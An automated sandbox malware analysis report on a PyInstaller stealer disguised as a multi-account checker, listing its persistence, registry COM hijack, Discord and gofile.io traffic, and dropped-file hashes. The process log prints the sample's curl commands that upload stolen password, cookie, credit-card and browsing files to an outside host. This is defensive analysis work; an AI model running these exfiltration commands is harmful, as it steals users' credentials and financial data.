Malware Analysis Report

2024-11-30 13:15

Sample ID 240620-x569tsxhnm
Target Multi-Account_checker.zip
SHA256 05c05cac0f44779afeb7999f88cb9f9e5ffbd7bcc8e737d0fac13261e2df4973
Tags
persistence privilege_escalation spyware stealer pyinstaller
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

05c05cac0f44779afeb7999f88cb9f9e5ffbd7bcc8e737d0fac13261e2df4973

Threat Level: Shows suspicious behavior

The file Multi-Account_checker.zip was found to be: Shows suspicious behavior.

Malicious Activity Summary

persistence privilege_escalation spyware stealer pyinstaller

Loads dropped DLL

Drops startup file

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Event Triggered Execution: Component Object Model Hijacking

Detects Pyinstaller

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Enumerates processes with tasklist

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-20 19:27

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240508-en

Max time kernel

233s

Max time network

246s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy_InUse.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MapiProxy_InUse.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "PSFactoryBuffer" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Interface C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods\ = "16" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32\ = "{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "nsIMapi" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy_InUse.dll

Network

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240611-en

Max time kernel

234s

Max time network

255s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Multi-Checker.exe C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4936 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe
PID 4936 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe
PID 3480 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 1372 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1372 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3480 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 964 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 964 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3480 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3040 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3040 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3480 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 2392 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2392 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3480 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 1684 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1684 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3480 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3656 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3656 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3480 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3664 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3664 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3480 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe C:\Windows\system32\cmd.exe
PID 2500 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2500 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4012,i,8998666007764333392,14724298544432336038,262144 --variations-seed-version --mojo-platform-channel-handle=3956 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.midi" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Downloads/RenameMove.midi" https://store9.gofile.io/uploadFile

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 200.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
IE 52.111.236.22:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 187.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI49362\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI49362\python311.dll

MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA1 7c4a3adf21ebcee5405288fc81fc4be75019d472
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA512 4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

C:\Users\Admin\AppData\Local\Temp\_MEI49362\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\_MEI49362\base_library.zip

MD5 d220b7e359810266fe6885a169448fa0
SHA1 556728b326318b992b0def059eca239eb14ba198
SHA256 ca40732f885379489d75a2dec8eb68a7cce024f7302dd86d63f075e2745a1e7d
SHA512 8f802c2e717b0cb47c3eeea990ffa0214f17d00c79ce65a0c0824a4f095bde9a3d9d85efb38f8f2535e703476cb6f379195565761a0b1d738d045d7bb2c0b542

C:\Users\Admin\AppData\Local\Temp\_MEI49362\_ctypes.pyd

MD5 22c4892caf560a3ee28cf7f210711f9e
SHA1 b30520fadd882b667ecef3b4e5c05dc92e08b95a
SHA256 e28d4e46e5d10b5fdcf0292f91e8fd767e33473116247cd5d577e4554d7a4c0c
SHA512 edb86b3694fff0b05318decf7fc42c20c348c1523892cce7b89cc9c5ab62925261d4dd72d9f46c9b2bda5ac1e6b53060b8701318b064a286e84f817813960b19

C:\Users\Admin\AppData\Local\Temp\_MEI49362\python3.DLL

MD5 d8ba00c1d9fcc7c0abbffb5c214da647
SHA1 5fa9d5700b42a83bfcc125d1c45e0111b9d62035
SHA256 e45452efa356db874f2e5ff08c9cc0fe22528609e5d341f8fb67ba48885ab77d
SHA512 df1b714494856f618a742791eefbf470b2eee07b51d983256e4386ea7d48da5c7b1e896f222ea55a748c9413203886cde3a65ef9e7ea069014fa626f81d79cd3

C:\Users\Admin\AppData\Local\Temp\_MEI49362\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI49362\_bz2.pyd

MD5 28ede9ce9484f078ac4e52592a8704c7
SHA1 bcf8d6fe9f42a68563b6ce964bdc615c119992d0
SHA256 403e76fe18515a5ea3227cf5f919aa2f32ac3233853c9fb71627f2251c554d09
SHA512 8c372f9f6c4d27f7ca9028c6034c17deb6e98cfef690733465c1b44bd212f363625d9c768f8e0bd4c781ddde34ee4316256203ed18fa709d120f56df3cca108b

C:\Users\Admin\AppData\Local\Temp\_MEI49362\_lzma.pyd

MD5 d386b7c4dcf589e026abfc7196cf1c4c
SHA1 c07ce47ce0e69d233c5bdd0bcac507057d04b2d4
SHA256 ad0440ca6998e18f5cc917d088af3fea2c0ff0febce2b5e2b6c0f1370f6e87b1
SHA512 78d79e2379761b054df1f9fd8c5b7de5c16b99af2d2de16a3d0ac5cb3f0bd522257579a49e91218b972a273db4981f046609fdcf2f31cf074724d544dac7d6c8

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-processthreads-l1-1-0.dll

MD5 d5fc4afae80dc3abf97b716416bc2952
SHA1 cd0fd43345393b633c315b489ee85fd846597ce6
SHA256 a1a413de3c85658d1672aa4c6aa77056e1a4884ab9ed5bb572cad991c9b348db
SHA512 d5fe2058bf212136248afe0675477ec03defab7db7e08667f9cf1fd9c1fb87d639a3af049639f7d1bfa136728d3ea420d85bcd20f8f3a39dda95cf69098d0bf2

C:\Users\Admin\AppData\Local\Temp\_MEI49362\VCRUNTIME140_1.dll

MD5 7e668ab8a78bd0118b94978d154c85bc
SHA1 dbac42a02a8d50639805174afd21d45f3c56e3a0
SHA256 e4b533a94e02c574780e4b333fcf0889f65ed00d39e32c0fbbda2116f185873f
SHA512 72bb41db17256141b06e2eaeb8fc65ad4abdb65e4b5f604c82b9e7e7f60050734137d602e0f853f1a38201515655b6982f2761ee0fa77c531aa58591c95f0032

C:\Users\Admin\AppData\Local\Temp\_MEI49362\unicodedata.pyd

MD5 57f8f40cf955561a5044ddffa4f2e144
SHA1 19218025bcae076529e49dde8c74f12e1b779279
SHA256 1a965c1904da88989468852fdc749b520cce46617b9190163c8df19345b59560
SHA512 db2a7a32e0b5bf0684a8c4d57a1d7df411d8eb1bc3828f44c95235dd3af40e50a198427350161dff2e79c07a82ef98e1536e0e013030a15bdf1116154f1d8338

C:\Users\Admin\AppData\Local\Temp\_MEI49362\sqlite3.dll

MD5 256224cc25d085663d4954be6cc8c5b5
SHA1 9931cc156642e2259dfabf0154fddf50d86e9334
SHA256 5ac6ee18cdca84c078b66055f5e9ffc6f8502e22eaf0fa54aeec92b75a3c463e
SHA512 a28abf03199f0ce9f044329f7eba2f1d8ecbc43674337aafbf173f567158ba9046036da91dc3e12c2bb1d7842953526edba14bc03f81ece63dcedcc9413213a7

C:\Users\Admin\AppData\Local\Temp\_MEI49362\select.pyd

MD5 8472d39b9ee6051c961021d664c7447e
SHA1 b284e3566889359576d43e2e0e99d4acf068e4fb
SHA256 8a9a103bc417dede9f6946d9033487c410937e1761d93c358c1600b82f0a711f
SHA512 309f1ec491d9c39f4b319e7ce1abdedf11924301e4582d122e261e948705fb71a453fec34f63df9f9abe7f8cc2063a56cd2c2935418ab54be5596aadc2e90ad3

C:\Users\Admin\AppData\Local\Temp\_MEI49362\pyexpat.pyd

MD5 6527063f18e8d49d04e2cc216c2f0b27
SHA1 917c349c62689f9b782a314ce4b2311b6b826606
SHA256 5604f629523125904909547a97f3cdb5dbfe33b39878bad77534de0c3c034387
SHA512 67c87d11683a0f4e1bc4083ff05edee423155f829051c3fa66cc4f2cfb98cf7374b3a06eb37095e19f5f2a6c8da83f0c0e3f7eb964694992b525f81b1b00f423

C:\Users\Admin\AppData\Local\Temp\_MEI49362\libssl-3.dll

MD5 bfc834bb2310ddf01be9ad9cff7c2a41
SHA1 fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c
SHA256 41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1
